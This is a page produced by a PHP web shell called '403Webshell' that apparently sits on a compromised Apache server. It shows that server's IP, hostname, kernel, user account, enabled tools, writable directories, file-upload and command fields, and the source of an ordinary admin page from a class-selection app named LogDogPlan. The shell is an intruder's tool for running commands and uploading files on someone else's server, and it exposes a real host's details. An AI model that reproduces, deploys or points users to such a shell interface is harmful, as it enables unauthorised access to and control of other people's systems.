403Webshell
Server IP : 93.86.61.54  /  Your IP : 216.73.216.60
Web Server : Apache/2.4.62 (Ubuntu)
System : Linux rasin.ddns.net 6.8.0-124-generic #124~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Tue May 26 21:05:19 UTC x86_64
User : www-data ( 33)
PHP Version : 8.4.22
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/projects/radvre/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/projects/radvre/admin/find_klas.php
<!DOCTYPE html>
<!--
**************************************
 Project: LogDogPlan
 File   :  
 Version: 2021-10-25
 Author : M. Kukic
 Note   : PHP + MySQL v5/7 + Apache 
*****************************************

//http://net-tim/www/logdog/find3_dog.php?datm=251021
-->
<html>
<link rel="stylesheet" href="lgdgstil.css">

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link rel='shortcut icon' type='image/png' href='favicon.ico'/>
<title>LogDogPlan</title>
</head>
<body>

<?php
//
include "config.php";
//
//echo $u_ime." - ".$u_sts." - ".$u_dbp." - ".$u_pass;
$tabela=$u_dbp."_logdog";
//
echo"<div style='width:640px; word-wrap:break-word;'>";
echo "<fieldset>";
echo "<legend><h3>LogDogPlan -  Izbor klase</h3></legend>";
echo "<table border=\"0\">";
echo "</fieldset>";
//
echo "<br>User: <b>".$u_ime."</b> - ".$u_sts."<br><br>";
//
/*
echo "<form action='dog_dog.php'>";
echo "Klasa: <input type='text' name='klas' id='klas' value='' size='6'>";
echo "<br><br>";
echo str_repeat('&nbsp;', 12)."<input type='submit' value='Enter'>";
echo "</form>";
*/
include "klase.php";
echo "<form action='dog_dog.php'>";
echo "<label for='klasa'>Klasa: </label>";
echo "<select name='klasa' id='klasa'>";
for ($k = 0; $k<($nklas); $k++) {	
  echo "<option value='".$klase[$k]."'>".$klase[$k]."</option>";
}
echo "</select>";
echo "<br><br>";
echo str_repeat('&nbsp;', 12)."<input type='submit' value='Enter'>";
echo "</form>";
echo "<br>";

include "close_db.php";
echo "<hr>";
echo "<a href='javascript:history.go(-1)'><img src='img/rw.png'>";
echo "</div>";
?>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit